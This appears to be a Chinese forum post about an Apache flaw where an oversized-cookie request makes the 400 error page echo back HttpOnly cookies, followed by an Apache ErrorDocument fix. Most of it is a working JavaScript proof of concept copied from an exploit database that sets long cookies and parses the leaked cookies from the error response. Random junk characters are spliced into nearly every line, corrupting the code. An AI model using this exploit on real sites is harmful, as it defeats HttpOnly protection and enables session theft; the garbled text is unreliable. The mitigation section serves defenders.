很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
" j, _" R: s: s( I7 ^9 O! i+ I: C/ U; t0 e
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
3 X; M S$ O5 j7 U8 p- y; W
/ Y. i# ^2 Y* J! ]3 v* r/ x/ l
, S% D9 V2 a. _// http://www.exploit-db.com/exploits/18442/
# @" Q7 Z, R/ @7 W& H Zfunction setCookies (good) {; p2 ^3 Q5 W* g' q4 O7 L Y6 _
// Construct string for cookie value+ ~' X; J- O! R& r# Z) ~# G
var str = "";
; c1 i8 h- _" x9 x, T- ~; wfor (var i=0; i< 819; i++) {
( T( t. B3 t; `/ Jstr += "x";
9 p9 [' n+ W9 U& S; r' A8 H0 |}( Q i% u: L* m) c
// Set cookies
6 Z1 t: C' J/ hfor (i = 0; i < 10; i++) {
& u+ k( Q. k1 [// Expire evil cookie
2 s: q3 W' z+ X1 u! `if (good) {
) Y2 F9 `3 f2 u. o3 Y4 j8 ]var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
0 `- E$ A/ |. C}: @/ d, E/ K+ j$ h; P- g
// Set evil cookie- v2 E" H6 z( U1 y" N* s6 F# |% K
else {
* ~; d. B% _6 ~8 T4 O) ~2 Cvar cookie = "xss"+i+"="+str+";path=/";. y1 i; E; l0 s4 ~3 e
}
0 u" c& u; j: K4 V" ]document.cookie = cookie;( F/ S/ Z5 j# f
}5 w$ o$ ] }/ w+ P" }
}* \ p: B, G) i3 x3 U* Q# m
function makeRequest() {- O0 p# y1 i* e5 B! P5 M8 U
setCookies();1 W3 y0 M! n# L7 z7 o
function parseCookies () {: J& S* L% s, ?+ R
var cookie_dict = {};) p/ k& F ]8 b, k1 n* b. u8 p6 g
// Only react on 400 status
/ ~! S# Y+ X8 h+ Q( r' l: K6 qif (xhr.readyState === 4 && xhr.status === 400) {
/ Z" W8 e/ z2 ~; m) P8 P// Replace newlines and match <pre> content
# t- V) E. S0 [" f6 t7 }0 v& Kvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
, [' a3 A3 T* oif (content.length) {$ O& F# z; v! U3 e# m
// Remove Cookie: prefix. K: ^9 l. _- s, D; r. I
content = content[1].replace("Cookie: ", "");
, R! `( ~& t/ L: hvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);6 N i2 O& _8 I# s7 i) F
// Add cookies to object, k; q, J( O; P1 P
for (var i=0; i<cookies.length; i++) {
" y! u: H/ s: K. _4 P8 z+ Avar s_c = cookies.split('=',2);
; q. V9 a; T' i9 [6 U/ \+ k5 [ Hcookie_dict[s_c[0]] = s_c[1];4 |& S. ^3 s8 A7 ?8 w
}3 L. G! F( ^. U" Q6 v: B
}% G' h5 Z4 L% ]$ P
// Unset malicious cookies
/ F4 u! t$ ^$ z$ o) B) W: k- A% BsetCookies(true);
% {' o" A! N$ E/ W$ C$ Walert(JSON.stringify(cookie_dict));0 g' p4 Z0 X/ b4 i
}' |2 A1 z$ [( }! L) w3 C. h
}9 E4 J. I# B9 |6 @
// Make XHR request0 @- C; T; @6 R- Y6 V0 O
var xhr = new XMLHttpRequest(); }& h0 y9 j7 a0 ~5 s* P
xhr.onreadystatechange = parseCookies;! r5 _$ ^: s/ b& u/ X
xhr.open("GET", "/", true);
! W. C5 A8 |5 q2 j" `xhr.send(null);
2 u, O; |/ A( Z- T( g}
# {1 f' w l: g2 e1 bmakeRequest(); O, h% v" y, s( n( }7 M8 d( o3 ]( E
/ L# R6 o9 z$ R1 O; e/ f你就能看见华丽丽的400错误包含着cookie信息。0 k$ g0 I7 B* b% G
5 ?& N0 c4 ~, b3 x: P下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#/ o! S3 E2 k* ?; l! W5 f0 ^
- L. B4 R: ?- G7 o3 J6 d, g5 A修复方案:
2 H) r+ x T+ k; u) J: r+ b8 c( A$ U0 x+ n) C7 D! ?" m2 h
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
+ S0 t2 V: ?& y# S
9 F! T" w. [. i1 d9 j7 x: o% fIn the event of a problem or error, Apachecan be configured to do one of four things,# q$ A0 G1 X9 `0 K0 [5 q
1 N F# s* d8 p0 c8 r4 M b j1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
2 h3 X9 @1 t8 P' g- A. x2. output acustomized message输出一段信息
3 c+ N: ~; n% E7 Q3 |9 \( H# y3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
% |2 k) O: v( i: ]4. redirect to an external URL to handle theproblem/error转向一个外部URL
+ S1 X+ O) {9 Q7 B, h, v/ T) g5 t! p/ u3 H; d
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
; n7 |0 N$ y9 `8 V
: z, n9 f4 @/ k0 {5 y, X1 lApache配置:6 @ Z5 W/ ?) v% h; _' P
, g% z6 `6 {4 c9 c6 X; P: M# w oErrorDocument400 " security test"
, p' Z" y+ }2 w8 Z! h9 {$ K* }' W3 e5 Q! O! p
当然,升级apache到最新也可:)。. p! j; t4 a; {1 N8 f) G" w E& D
* \" P6 x; \( B& r6 v" f
参考:http://httpd.apache.org/security/vulnerabilities_22.html) B" M. w- u" D- v0 J
2 t, G2 [& w% V- T
|